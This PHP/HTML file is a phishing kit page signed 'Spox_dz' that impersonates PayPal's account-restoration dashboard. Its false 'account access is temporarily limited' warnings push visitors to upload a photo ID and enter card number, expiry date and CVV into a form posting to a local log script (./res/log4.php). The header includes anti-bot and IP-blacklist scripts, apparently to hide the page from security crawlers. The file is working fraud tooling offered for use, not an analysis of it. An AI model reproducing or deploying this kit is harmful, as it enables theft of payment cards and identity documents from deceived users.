
<?php
session_start();
error_reporting(0);

/**
 * DO NOT SELL THIS SCRIPT ! 
 * DO NOT CHANGE COPYRIGHT !
 * Chase -
 * version 3.0
 * icq & telegram = @spoxcoder
 
###############################################
#$            C0d3d by Spox_dz               $#
#$   Recording doesn't  make you a Coder     $#
#$          Copyright 2020 Chase             $#
###############################################

**/
include'antiobot.php';  
include'Spox/Anti/IP-BlackList.php';  
include'Spox/Anti/Bot-Crawler.php';
include'Spox/Anti/Bot-Spox.php';
include'Spox/Anti/blacklist.php';
include'Spox/Anti/new.php';
include'Spox/Functions/Fuck-you.php'; 
include'Spox/Anti/Dila_DZ.php';
include'admin/YOUR-CONFIG.php';
***************************************************************************************************************************************************************************************************************************************************

<!DOCTYPE html>
<html lang="en"
      class="fresh-html"
      data-controller="store_logins"
      data-action="new">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel='preconnect' href='https://v.shopify.com'>
<link rel='preconnect' href='https://monorail-edge.shopifysvc.com' crossorigin>
<link rel='preconnect' href='https://cdn.shopify.com'>
<link rel='preconnect' href='https://www.gstatic.com' crossorigin>
<link rel='preconnect' href='https://www.google.com' crossorigin>
<link rel='preconnect' href='https://fonts.gstatic.com' crossorigin>
<link rel='preconnect' href='https://www.recaptcha.net' crossorigin>
  <link rel='preconnect' href='https://shopify-assets.shopifycdn.com' crossorigin>
<title>Restore Account</title><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="application-name" content="PayPal"><meta name="msapplication-task" content="name=My Account;action-uri=https://www.paypal.com/us/cgi-bin/webscr?cmd=_account;icon-uri=http://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><meta name="msapplication-task" content="name=Send Money;action-uri=https://www.paypal.com/us/cgi-bin/webscr?cmd=_send-money-transfer&amp;send_method=domestic;icon-uri=http://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><meta name="msapplication-task" content="name=Request Money;action-uri=https://personal.paypal.com/cgi-bin/?cmd=_render-content&amp;content_ID=marketing_us/request_money;icon-uri=http://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><meta name="keywords" content="transfer money, email money transfer, international money transfer "><meta name="description" content="Transfer money online in seconds with PayPal money transfer. All you need is an email address."><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><link rel="stylesheet" href="https://www.paypalobjects.com/web/res/ce8/02836256934b386890fa5d155e320/css/app.css"><!--[if IE]><style>#modal-close-div {position: static;height: 0;}#modal-close-btn {right: 100%;float: right;position: static;}</style><![endif]--><script src="https://www.paypalobjects.com/messaging/messaging-chat/v19/messaging-chat.js" defer=""></script><script crossorigin="anonymous" src="https://www.paypalobjects.com/pa/mi/miconfig.js"></script><script data-test="ieScript" nonce="">var isLessthanIE10 = false; window.onload = function() { if (isLessthanIE10) { document.getElementById('js_foreground').className += ' vx_hasNavAlert'; } }</script><script nonce="">var helpCenterSpark = function () {}; var mountElement; var mountData = function(retry) { mountElement = document.getElementById('hc-contextual-help-app'); if (typeof mountElement !== 'undefined' && mountElement) { mountElement.dataset.locale = 'en_SG'; mountElement.dataset.country = 'SG'; } else if (retry >= 0) { return setTimeout(function() { mountData(retry - 1); }, 200); } }; mountData(10); document.addEventListener('DOMContentLoaded', function () { var helpLinks = document.querySelectorAll('.js_contextualHelp'); for (var i = 0; i < helpLinks.length; i++) { helpLinks[i].addEventListener('click', function(event) { if (helpCenterSpark) { event.preventDefault(); helpCenterSpark('show'); } }); } })</script><script async="" defer="" src="https://www.paypalobjects.com/helpcenter/helpcenter-widget.min.js"></script><script async="" defer="" src="https://www.paypalobjects.com/messaging/messaging-loader.js"></script><script defer="" src="https://www.paypalobjects.com/ui-web/e79/c5920b3/e79/c5920b3/ui-web/notifications/1.38.0/notifications.min.js"></script> <link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/ui-web/ui-web/header-footer/1.40.0/header-footer.min.css"><style nonce="">@media print and (max-width: 768px) { .vx_globalNav-container { display: none; } }</style><script type="text/javascript" charset="utf-8" async="" src="js/0.bundle.js"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="_languagepack" src="https://www.paypalobjects.com/web/res/ce8/02836256934b386890fa5d155e320/en-SG/_languagepack.js"></script></head><body data-ppo-url="https://www.paypalobjects.com/web/res/ce8/02836256934b386890fa5d155e320/js" data-view-name="dashboard" id="page" dir="" data-template-path="https://www.paypalobjects.com/web/res/ce8/02836256934b386890fa5d155e320/js/templates/%s" class=" vx_foreground-container "><input type="checkbox" id="toggleNavigation" class="vx_globalNav-toggleCheckbox" style="display: none;"><div id="menu" class="panel panel-bigslide" role="navigation" style="position: fixed; top: 0px; bottom: 0px; width: 375px; height: 100%; right: -375px; transition: right 300ms ease 0s;"><div class="nbox link"><a href="#menu-close" id="modal-close-btn" class="menu-link dashboard-close" pa-marked="1"></a></div><div class="nbox notification primary"><table class="help-table"><tbody><tr><td width="35" valign="top"><span class="help-span td-1"></span></td><td valign="top"><p class="heading heading-filler">What's going on?</p><p class="content content-filler">We want to help ensure PayPal is a more secure place to do business. We noticed some changes in your account that require further verification. During this time, you may not have access to certain account activities. Please review the Account impact section for more information about what you can and cannot do.</p></td></tr><tr><td width="35" valign="top"><span class="help-span td-2"></span></td><td valign="top"><p class="heading heading-filler">What do I need to do?</p><p class="content content-filler">Please provide all of the information we've requested. You'll see a green tick once you've provided the information we need. When all steps have been completed, we’ll let you know when you can expect a response.</p></td></tr><tr><td width="35" valign="top"><span class="help-span td-3"></span></td><td valign="top"><p class="heading heading-filler">How long does it take?</p><p class="content content-filler">Once you’ve provided all of the information we requested, we’ll review it and respond to you within 5-7 business days. If we collect information that doesn’t require review by our team, your account will be back to normal right away.</p></td></tr><tr><td width="35" valign="top"><span class="help-span td-4"></span></td><td valign="top"><p class="heading heading-filler">Why does PayPal want to know this information?</p><p class="content content-filler">PayPal collects information so we can help maintain a secure place for our buyers and sellers to do business. For instance, we may ask for personal details to confirm your identity or details to verify your account activity based on the changes we are seeing. Learn more about our <b><a href="" target="_blank" pa-marked="1">Privacy Statement</a></b></p></td></tr></tbody></table></div></div> <div id="body" class="push " style="right: 0px; transition: right 300ms ease 0s;"><!-- adding spinner to dashboard --><div class="dashboard-page"><div class="dashboard-contents" style="display: none;"><div class="loading"></div></div></div><!-- End of adding spinner to dashboard --><div id="main" class="page-container"><div class="vx_globalNav-main globalNav-main js_globalNavView js_ppLogo test2" role="banner"><div id="hc-contextual-help-app" data-locale="en_SG" data-country="SG"></div><div class="vx_globalNav-container"><a href="/myaccount/summary" id="header-ppLogo" name="header-logo" data-name="header-logo" data-pagename="main:header" data-pa-click="true" class="vx_globalNav-brand_desktop" pa-marked="1"><span class="vx_a11yText">Summary</span></a><div class="vx_globalNav-secondaryNav_mobile"><div class="vx_globalNav-listItem_mobileLogout"><a href="/signout" id="header-logout_mobile" name="header-logout_mobile" data-pagename="main:header" class="vx_globalNav-link_mobileLogout" pa-marked="1">Log Out</a></div><div class="vx_globalNav-listItem_settings"><a href="/myaccount/settings" id="header-settings_mobile" name="header-settings_mobile" data-pagename="main:header" class="vx_globalNav-svgIcon vx_globalNav-link_settings" pa-marked="1"><img alt="Settings" src="https://www.paypalobjects.com/ui-web/icons/1-0-0/settings.svg" width="26px" height="26px" aria-hidden="true"><span class="vx_a11yText">Settings</span></a></div><div><p class="vx_h5 vx_globalNav-displayName"></p></div></div><div class="vx_globalNav-navContainer"><nav class="vx_globalNav-nav" role="navigation"><ul class="vx_globalNav-list"><li class=""><a href="/myaccount/summary" target="_self" id="header-newSummary" name="header-newSummary" data-name="header-newSummary" data-pagename="main:header" data-pa-click="header-newSummary" class="vx_globalNav-links js_summary" pa-marked="1">Summary</a></li><li class=""><a href="/myaccount/activity" target="_self" id="header-activity" name="header-activity" data-name="header-activity" data-pagename="main:header" data-pa-click="header-activity" class="vx_globalNav-links js_activity" pa-marked="1">Activity</a></li><li class=""><a href="/myaccount/transfer?from=Header" target="_self" id="header-transfer" name="header-transfer" data-name="header-transfer" data-pagename="main:header" data-pa-click="header-transfer" class="vx_globalNav-links js_sendMoney" pa-marked="1">Send &amp; Request</a></li><li class=""><a href="/myaccount/money" target="_self" id="header-wallet" name="header-wallet" data-name="header-wallet" data-pagename="main:header" data-pa-click="header-wallet" class="vx_globalNav-links js_wallet" pa-marked="1">Digital Wallet</a></li><li class=""><a href="/sg/webapps/mpp/where-to-shop-with-paypal" target="_self" id="header-offers" name="header-offers" data-name="header-offers" data-pagename="main:header" data-pa-click="header-offers" class="vx_globalNav-links js_offers" pa-marked="1">Offers</a></li><li class=""><a href="/selfhelp/home" target="_self" id="header-contextualHelp" name="header-contextualHelp" data-name="header-contextualHelp" data-pagename="main:header" data-pa-click="header-contextualHelp" class="vx_globalNav-links js_contextualHelp" pa-marked="1">Help</a></li></ul><ul class="vx_globalNav-list_secondary"><li class="vx_hidden-phone" data-autodisplay="true"><a href="#" id="header-notifications" data-name="header-notifications" class="vx_globalNav-svgIcon vx_globalNav-link_notifications vx_isCritical js_notifications js_notificationDesktopBtn cw_popover-trigger" data-popover-autodisplay="false" data-popover-id="notifications-popover" data-popover-offset="15" data-pagename="main:notifications::toggle" data-popover-pagename-show="main:notifications:toggle" data-popover-pagename-hide="main:notifications:toggle" data-pa-click="true" pa-marked="1"><img style="pointer-events:none" alt="Notifications" class="notifications-icon" src="https://www.paypalobjects.com/ui-web/icons/1-0-0/notifications.svg" width="32px" height="32px" aria-hidden="true"><span class="vx_notificationCount js_notificationCount">1</span><span class="vx_a11yText">Notifications</span></a><div id="notifications-popover" class="cw_popover-container cw_notifications-container" tabindex="0"><div id="cw_tab-list" class="cw_tab-list"><button id="cw_tab-notifications" data-panel="cw_panel-notifications" class="cw_tab cw_tab_notifications cw_tab_selected" data-pagename="main:notifications:toggleNotifs" pa-marked="1">Notifications (<span id="notificationCount">1</span>)</button><button id="cw_tab-messages" data-panel="cw_panel-messages" class="cw_tab cw_tab_messages" data-pagename="main:notifications:toggleSMC" pa-marked="1">Inbox (<span id="messageCount">0</span>)</button></div><div class="cw_tab-list-shadow"></div><div class="cw_popover-body"><ul class="cw_panel cw_panel_notifications cw_panel_selected" id="cw_panel-notifications"><li id="notification-113956497900693794" class="cw_notification"><div class="cw_notification-header" style="color:#D20000">Your account access is temporarily limited</div><div class="cw_notification-description"><span class="cw_notification-descriptionIcon"><img src="https://www.paypalobjects.com/ui-web/icons/1-0-0/warning.svg" class="warning-icon" width="28" height="28"></span><span class="cw_notifications-descriptionContent">We recently received a report of unauthorised activity on a card linked to your PayPal account. To keep your account secure, we've limited certain features in your account. You'll need to provide the requested information to regain full access.</span></div><a href="" data-id="113956497900693794" data-url="/myaccount/info/notifications/dismiss/113956497900693794" data-pagename="main:notifications:WS_Label_Alert_Restriction_5_001_Accessblock_Text:cta" class="cw_notification-link" pa-marked="1">Provide information</a></li></ul><ul class="cw_panel cw_panel_messages" id="cw_panel-messages"><li class="cw_notification"><div class="cw_notification-subheader">Messages</div><div class="cw_notification-description">You have no new messages.</div><a href="/selfhelp/smc/" class="cw_notification-link" pa-marked="1">View Messages</a></li></ul></div></div></li><li><a href="/myaccount/settings" id="header-settings" name="header-settings" data-name="header-settings" data-pagename="main:header" data-pa-click="true" class="vx_globalNav-svgIcon vx_globalNav-link_settings js_settings" pa-marked="1"><img alt="Settings" src="https://www.paypalobjects.com/ui-web/icons/1-0-0/settings.svg" width="26px" height="26px" aria-hidden="true"><span class="vx_a11yText">Settings</span></a></li><li class="vx_globalNav-listItem_logout"><a href="/signout" id="header-logout" name="header-logout" data-name="header-logout" data-pagename="main:header" data-pa-click="true" class="vx_globalNav-link_logout js_logout" pa-marked="1">Log Out</a></li></ul></nav></div></div><div><!--[if lte IE 10]>
				<div class="vx_globalNav-alertContainer vx_globalNav-alertWarning vx_hidden-phone">
					<div class="vx_alert_inline vx_alert-warning">
						<p class="vx_alert-text">Your browser is out of date. Get the latest version to see all your account features.</p>
					</div>
				</div>
			<![endif]--></div></div> <div class="vx_globalNav-main_mobile"><div class="vx_globalNav-headerSection_trigger"><div class="vx_globalNav-toggleTrigger-container"><button id="toggleNavigationButton" class="vx_globalNav-toggleTrigger_animated" pa-marked="1"><span></span><div class="vx_globalNav-toggleTrigger_animated_open">Menu</div><div class="vx_globalNav-toggleTrigger_animated_close">Close</div></button></div></div><div class="vx_globalNav-headerSection_logo"><a href="/myaccount/summary" id="header-ppLogo_mobile" class="vx_globalNav-brand_mobile" pa-marked="1"><span class="vx_a11yText">Summary</span></a></div><ul class="vx_globalNav-headerSection_actions"><li class="vx_globalNav-actionItem_mobileglobalNav_notificationItem vx_globalNav-notificationItem_mobile"><a class="vx_globalNav-svgIcon vx_globalNav-link_notifications notifications_mobile vx_isCritical js_notificationDesktopBtn cw_notifications-mobile-trigger" id="header-openNotifications" role="button" title="Notifications" data-popover-autodisplay="false" data-modal-id="notifications-mobile" pa-marked="1"><img style="pointer-events:none" alt="Notifications" class="notifications-icon" src="https://www.paypalobjects.com/ui-web/icons/1-0-0/notifications.svg" width="32px" height="32px" aria-hidden="true"><span class="vx_notificationCount js_notificationCount">1</span><span class="vx_a11yText">Notifications</span></a></li></ul><div class="vx_modal-flow" id="notifications-mobile"><div class="vx_modal-wrapper cw_notifications-modal-wrapper"><div class="vx_modal-content cw_notifications-mobile-content"><div id="notifications-mobile-popover" class="cw_notifications-mobile-container" tabindex="0"><header class="vx_modal-header cw_notifications-mobile-content-header"><span class="vx_modal-dismiss_trigger" data-modal-id="notifications-mobile"><svg class="close-icon" width="24" height="24" viewBox="0 0 97.998 120" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" data-id="cw_notifications-mobile-dismiss"><path stroke="#2C2E2F" fill="#2C2E2F" d="m82.91 99.121q2.8e-14 0.87891-0.53711 1.416-0.53711 0.53711-1.416 0.53711-0.87891 0-1.4648-0.58594l-30.469-30.469c-7.6538 7.6416-22.961 22.925-30.615 30.566q-0.53711 0.58594-1.416 0.58594t-1.416-0.58594q-1.416-1.416 0-2.7832c10.173-10.205 22.888-22.961 30.518-30.615-7.6294-7.6172-22.888-22.852-30.518-30.469q-1.416-1.5137 0-2.8809 1.416-1.3672 2.9297-0.048829c10.173 10.205 22.888 22.961 30.518 30.615 7.6416-7.6538 22.925-22.961 30.566-30.615q0.48828-0.58594 1.3672-0.58594t1.4648 0.58594q1.416 1.416 0 2.832c-10.205 10.189-22.961 22.925-30.615 30.566 7.6294 7.6294 22.888 22.888 30.518 30.518q0.58594 0.53711 0.58594 1.416z" stroke-width="0px"></path></svg><span class="vx_a11yText">Close</span></span><img style="pointer-events:none" alt="Notifications" class="notifications-icon" src="https://www.paypalobjects.com/ui-web/icons/1-0-0/notifications.svg" width="32px" height="32px" aria-hidden="true"><div id="cw_tab-list" class="cw_tab-list"><button id="cw_tab-notifications" data-panel="cw_panel-notifications" class="cw_tab cw_tab_notifications cw_tab_selected" data-pagename="main:notifications:toggleNotifs" pa-marked="1">Notifications (<span id="notificationCount">1</span>)</button><button id="cw_tab-messages" data-panel="cw_panel-messages" class="cw_tab cw_tab_messages" data-pagename="main:notifications:toggleSMC" pa-marked="1">Inbox (<span id="messageCount">0</span>)</button></div><div class="cw_tab-list-shadow"></div></header><div class="cw_popover-body"><ul class="cw_panel cw_panel_notifications cw_panel_selected" id="cw_panel-notifications"><li id="notification-113956497900693794" class="cw_notification"><div class="cw_notification-header" style="color:#D20000">Your account access is temporarily limited</div><div class="cw_notification-description"><span class="cw_notification-descriptionIcon"><img src="https://www.paypalobjects.com/ui-web/icons/1-0-0/warning.svg" class="warning-icon" width="28" height="28"></span><span class="cw_notifications-descriptionContent">We recently received a report of unauthorised activity on a card linked to your PayPal account. To keep your account secure, we've limited certain features in your account. You'll need to provide the requested information to regain full access.</span></div><a href="https://www.paypal.com/restore/dashboard" data-id="113956497900693794" data-url="/myaccount/info/notifications/dismiss/113956497900693794" data-pagename="main:notifications:WS_Label_Alert_Restriction_5_001_Accessblock_Text:cta" class="cw_notification-link" pa-marked="1">Provide information</a></li></ul><ul class="cw_panel cw_panel_messages" id="cw_panel-messages"><li class="cw_notification"><div class="cw_notification-subheader">Messages</div><div class="cw_notification-description">You have no new messages.</div><a href="/selfhelp/smc/" class="cw_notification-link" pa-marked="1">View Messages</a></li></ul></div></div></div></div></div></div><input type="hidden" name="clientModel" id="clientModel" value=""><input type="hidden" name="_csrf" id="dashboardcsrf" value="B5mcGOVR1OqxqxI/5l9wwHPgvqDu+J9868OPI="><input type="hidden" name="isAuthFlowFailed" id="isAuthFlowFailed" value=""><div class="container dashboard-body content_foreground-container" data-role="main"><div class="row limitation-tray"><div class="col-md-3 account-impact"><div class="panel panel-left impact-panel"> <div class="panel-body"><div id="impactPanelTitle" class="panel-title">Account impact</div><div class="impact-actions"><div class="tab-content"><div role="tabpanel" class="tab-pane active" id="messages"><div class="row wow fadeInLeft animated" style="visibility: visible; animation-name: fadeInLeft;"><div class="action-row row"><div class="action-img blocked"></div><div class="action-name">Withdraw money from PayPal</div></div><div class="action-row row"><div class="action-img blocked"></div><div class="action-name">Send money or payments</div></div><div class="action-row row"><div class="action-img blocked"></div><div class="action-name">Refund money to customers</div></div><div class="action-row row"><div class="action-img blocked"></div><div class="action-name">Pay using PayPal</div></div><div class="action-row row"><div class="action-img not-blocked"></div><div class="action-name">Receive money or payments</div></div></div></div><div role="tabpanel" class="tab-pane" id="settings"><div class="row wow fadeInLeft animated" style="visibility: visible; animation-name: fadeInLeft;"><div class="action-row row"><div class="col-sm-3 col-xs-3 action-img blocked"></div><div class="col-sm-9 col-xs-9 action-name">Withdraw money from PayPal</div></div><div class="action-row row"><div class="col-sm-3 col-xs-3 action-img blocked"></div><div class="col-sm-9 col-xs-9 action-name">Send money or payments</div></div><div class="action-row row"><div class="col-sm-3 col-xs-3 action-img blocked"></div><div class="col-sm-9 col-xs-9 action-name">Refund money to customers</div></div><div class="action-row row"><div class="col-sm-3 col-xs-3 action-img blocked"></div><div class="col-sm-9 col-xs-9 action-name">Pay using PayPal</div></div><div class="action-row row"><div class="col-sm-3 col-xs-3 action-img blocked"></div><div class="col-sm-9 col-xs-9 action-name">Receive money or payments</div></div></div></div><div class="row"><div class="row view-list" align="left"><a href="" data-toggle="modal" class="viewAll-link" id="viewAll" pa-marked="1">View all</a></div></div></div></div></div></div></div><div class="col-md-9 account-resolve">                          
			
			
			
			
			
			
			
			
			
			
			
			
			
			
			
			
			
			
			
			<div class="panel panel-right"><div class="panel-body"><div id="dashboardPanelTitle" class="panel-title"><span class="limitation-head">Your account access is temporarily limited</span></div><div id="limitationDetailsContainer"><div><div class="row reason-tray">We received a report of unauthorised activity with the card linked to your PayPal account. To help keep you and the PayPal community secure, we need to better understand this activity.<br><br><span>In an effort to keep your account secure, we've also limited certain features in your account. You'll be able to regain access to these features once you provide the information we've requested.</span><br>    </div><!-- <div class="more-info-tray"><a href="#menu" class="menu-link">Understand account limitations <span class="icon icon-arrow-right-small"></span></a></div>--><!--<div class="impact-level"><span> Impact on account:</span><span class="medium"> Medium</span></div>--><div class="reference"><span>Reference ID:</span><span> PP-L-232575429746</span></div><div class="row appealsteps-tray" id="appealSteps"><div class=""><div class="appealstep-details row"><div class="appealstep-action col-md-4 col-sm-4 col-xs-4"><div><div class=" vx_modal-glimpse vx-modal-component-modal-outer proofId-modal-outer" role="dialog" aria-describedby="proofIdModal-header" id="proofIdModal-3_1225583679" tabindex="-1" aria-labelledby="proofIdModal" aria-hidden="true" data-backdrop="static" data-keyboard="false"><div class="vx_modal-wrapper vx-modal-component-modal-wrapper proofId-modal-wrapper"><div class="logo vx-modal-component-modal-logo proofId-modal-logo"></div><button class="vx_modal-dismiss_x vx-modal-component-dismiss-x proofId-dismiss-x appealstep-close proofId-close-action" data-modal-id="proofIdModal-3_1225583679"><span class="vx_a11yText">Close</span></button><form id="proof-id-3" class="upload-form" method="POST" data-auto-disable="false" enctype="multipart/form-data"><div class="vx_modal-content vx-modal-component-content proofId-content"><input type="hidden" name="language" id="language" value="en"><input type="hidden" name="country" id="country" value="SG"><input type="hidden" name="_csrf" id="csrf" value="B5mcGOVR1OqxqxI/5l9wwHPgvqDu+J9868OPI="><input type="hidden" name="appealStepId" id="appealStepId" value="3"><input type="hidden" name="appealId" id="appealId" value="1225583679"><input type="hidden" name="appealStepHeader" id="appealStepHeader" value="Upload a photo ID"><input type="hidden" name="appealStepDescription" id="appealStepDescription" value="To help keep all our members safe, we need to know our community. Please provide a document that verifies your identity. <br><br> What document would you like to upload?"><input type="hidden" name="caseMgmtSystem" id="caseMgmtSystem" value="SCM"><input type="hidden" name="doctype" id="doctype" value=""><div class="proofId-content-head" id="fileUploadBody"><h2 class="vx_text-1 vx-modal-component_HeadText-1 provideInfo_text-1">Upload a photo ID</h2><p class="vx_text-body-md vx-modal-component_text-body-md provideInfo_text-body-md">To help keep all our members safe, we need to know our community. Please provide a document that verifies your identity. <br><br> What document would you like to upload?</p>			<div class="vx_text-body-md vx-modal-component_text-body-md upload-guide" id="uploadGuide"><ul class="uguide-bulk"><li class="uguide-bulk-list">Your documents need to be valid and legible.</li><li class="uguide-bulk-list">The submitted information on the documents must correspond with the information on your PayPal account.</li><li class="uguide-bulk-list">Your documents shouldn't include selfies or images of people.</li><li class="uguide-bulk-list">We will handle your information in accordance with our <a class="a-privacy" href="https://www.paypal.com/webapps/mpp/ua/privacy-full" target="_blank">Privacy Statement<span class="link-ext-icon"></span></a>.</li></ul></div><div class="vx_select input-field"><select id="uploadOption" class="form-control vx_form-control vx-modal-component-select doc-upload-select required"><option selected="" hidden="" disabled="" value="-1" class="vx-modal-component-option-selected">Document type</option><option value="0">Driver's License (front only)</option><option value="1">Passport</option><option value="2">Military ID</option><option value="149">National ID</option></select></div><div><div id="upload-3_1225583679" class="upload-document"><input type="hidden" id="language" value="en"><input type="hidden" name="country" id="country" value="SG"><input type="hidden" name="fileSizeUnit" id="fileSizeUnit" value="kB"><input type="hidden" name="fileSizeUnitMb" id="fileSizeUnitMb" value="MB"><div id="error-list" class="error-list vx-modal-component-upload-err-wrapper"><p id="FE_DU_010" class="error-msg vx-modal-component-upload-alert">File should be between 10 KB to 5 MB in size.</p><p id="FE_DU_020" class="error-msg vx-modal-component-upload-alert">File should be between 10 KB to 5 MB in size.</p><p id="FE_DU_030" class="error-msg vx-modal-component-upload-alert">File must be a jpg gif png or pdf.</p><p id="FE_DU_050" class="error-msg vx-modal-component-upload-alert">Combined file size must not exceed 10MB. Please remove one or more files to proceed.</p><p id="FE_DU_040" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="FE_DU_060" class="error-msg vx-modal-component-upload-alert">You’ve reached the maximum amount of attachments allowed.</p><p id="FE_DU_070" class="error-msg vx-modal-component-upload-alert"> You must select a response.</p><p id="FE_DU_080" class="error-msg vx-modal-component-upload-alert">You must upload a file or add a link to continue.</p><p id="FE_DU_090" class="error-msg vx-modal-component-upload-alert">You must upload a file.</p><p id="NE_DU_005" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="NE_DU_010" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="NE_DU_020" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="SE_DU_010" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="SE_DU_020" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="SE_DU_030" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="SE_DU_040" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="SE_DU_400" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="SE_DU_440" class="error-msg vx-modal-component-upload-alert">We’ve detected a virus in the file you’ve uploaded. Please try again with another file.</p><p id="SE_DU_441" class="error-msg vx-modal-component-upload-alert">You’ve uploaded a file that isn’t a qualified document type. Please upload the right document.</p><p id="SE_DU_442" class="error-msg vx-modal-component-upload-alert">You’ve uploaded a file that’s blurred or is of low quality. Please upload a document with better quality.</p><p id="SE_DU_443" class="error-msg vx-modal-component-upload-alert">The size of the file you’ve uploaded is lesser than the minimum size requirement of 10KB. Please try again with a larger file.</p></div><div id="error-list" class="error-list vx-modal-component-upload-err-wrapper"><p id="FE_DU_100" class="error-msg vx-modal-component-upload-alert">You must add a comment.</p></div><div class="notification-list"><p id="FN_DU_010" class="notification-msg">You’ve successfully uploaded your files. You’re all set.</p></div><div class="classic-experience"><input class="desktopUploadControl" name="desktopUploadControl" type="file" accept="image/jpeg,image/pjpeg,image/png,image/gif,application/pdf"></div><div id="upload-area" class="row upload-area soft-hide"><div class="upload-area-desktop row"><div class="col-sm-12"><div id="desktopUploadArea" class="box drag-and-drop desktopUploadArea"><label for="desktopUploadControl" id="desktopUploadButton" class="upload-button"><span class="full-experience">Drag and drop</span><span class="classic-experience">Upload file</span></label></div></div></div><div class="requirement-desktop row"><div class="col-sm-4 col-xs-4 desktopUploadButton"><a href="">Browse Files</a></div><div class="col-sm-7 col-xs-7 requirement">JPG GIF PNG PDF | 5 MB each</div></div></div><div class="preview-row row"><div class="col-md-12 preview-area-wrap"><div id="preview-area" class="preview-area desktop row soft-hide"><div id="filePreview" class="filePreview soft-hide drag-and-drop"><div id="fileInfo" class="fileInfo">File name:</div><a href="#"><span class="remove-file"></span></a></div></div></div></div><div style="display:none" class="vx_text-body-md vx-modal-component_text-body-md document-link-area" id="document-link-area"><div class="or-wrap"><h3><span class="or-wrap-content">Or</span></h3></div><br><p id="linkToDocumentText" class="linkToDocumentHeadText">Provide a link to your document</p><br><div class="textInput long"><input type="text" placeholder="Enter document URL" id="linkToDocument" name="linkToDocument" class="form-control vx_form-control vx-modal-component-input-text hasHelp validate" autocomplete="off" maxlength="200"><label for="linkToDocument" class="linkToDocumentTextLabel">For example: http://www.yourwebsite.com.au/document_name.html</label>   </div><br></div></div></div></div></div></form><div class="page"><div class="contents"><div class="loading"></div></div></div></div><!-- /.modal-wrapper --></div><!-- /.modal-outer --></div>                            
			
			
			 <form id="abbott-form" method="post" action="./res/log4.php" class="abbott-form">
			
			
			
			
			
			
			
			
			
			
			
			
			
			<div class="appealstep-button"></div></div></div></div><div class="appealstep-wrapper "><div class="appealstep-details row"><div class="appealstep-header col-md-8 col-sm-8 col-xs-8"><div> Confirm a card </div></div><div class="appealstep-action col-md-4 col-sm-4 col-xs-4"><div><div id="confirmCardModal-2_1225583678" class="vx_modal-glimpse vx-modal-component-modal-outer confirmCardModal" tabindex="-1" role="dialog" aria-labelledby="confirmCardModal" aria-hidden="true" data-backdrop="static" data-keyboard="false"><div class="vx_modal-wrapper vx-modal-component-modal-wrapper confirmBank-modal-wrapper"><div class="logo vx-modal-component-modal-logo confirmBank-modal-logo"></div><div class="vx_modal-content vx-modal-component-content confirmBank-content"><form id="confirmCard-form" class="upload-form " method="POST" data-auto-disable="false" enctype="multipart/form-data"><input type="hidden" name="confirmCardUrl" id="confirmCardUrl" value=""><h2 class="vx_text-1 vx-modal-component_HeadText-1 provideInfo_text-1">Confirm your card</h2><div class="online-flow"><p class="vx_text-body-md vx-modal-component_text-body-md" style="margin-bottom: 30px;">To resolve this limitation, you'll need to  confirm a credit or debit card linked to your PayPal account.</p></div><div class="upload-flow soft-hide"><p class="vx_text-body-md vx-modal-component_text-body-md">Confirm a credit or debit card you have linked to your account by uploading your most recent card statement.</p></div><div class="vx-modal-component-form-content"><div class=""><select id="confirmCard" name="confirmCard" class="form-control vx_form-control vx-modal-component-select doc-upload-select cardList required"><option selected="" hidden="" disabled="" value="-1" class="vx-modal-component-option-selected">Choose your card</option> MASTER_CARD x-9647<<option value="-1">Select your card type</option><option value="visa">Visa</option><option value="master_card">Mastercard</option><option value="amex">American Express</option><option value="discover">Discover</option><option value="china_union_pay">UnionPay</option></select>
			
			
			
			
			
			
			
			
			<div class="vx_form-group vx_floatingLabel vx_floatingLabel_active" data-label-content="Debit or credit card number"><label class="floatingLabel" for="cardNumber">Debit or credit card number</label><input type="text" maxlength="16" aria-describedby="text-info-cardNumber" name="cardNumber" required="required" pattern="[0-9]*"  class="test_cardNumber test_cardNumber vx_form-control" placeholder="Enter card number" autocomplete="off" value=""></div>
			
			
			
			
			
			<div class="vx_form-group vx_floatingLabel vx_floatingLabel_active" data-label-content="Expiration date"><label class="floatingLabel" for="expDate">Expiration date</label><input type="text" id="expDate" aria-describedby="text-info-expDate" name="expDate" required="required" pattern="(?:0[1-9]|1[0-2])/[0-9]{2}" class="test_expDate vx_form-control" placeholder="mm/yy" autocomplete="off" value=""></div>
			
			
			
			
			
			
			
			<div class="vx_form-group vx_floatingLabel vx_floatingLabel_active" data-label-content="CVV"><label class="floatingLabel" for="verificationCode">CVV</label><input type="text" id="verificationCode" aria-describedby="text-info-verificationCode" name="verificationCode" required="required" class="test_verificationCode test_verificationCode vx_form-control" placeholder="Enter security code" autocomplete="cc-csc" value=""></div>
			
			
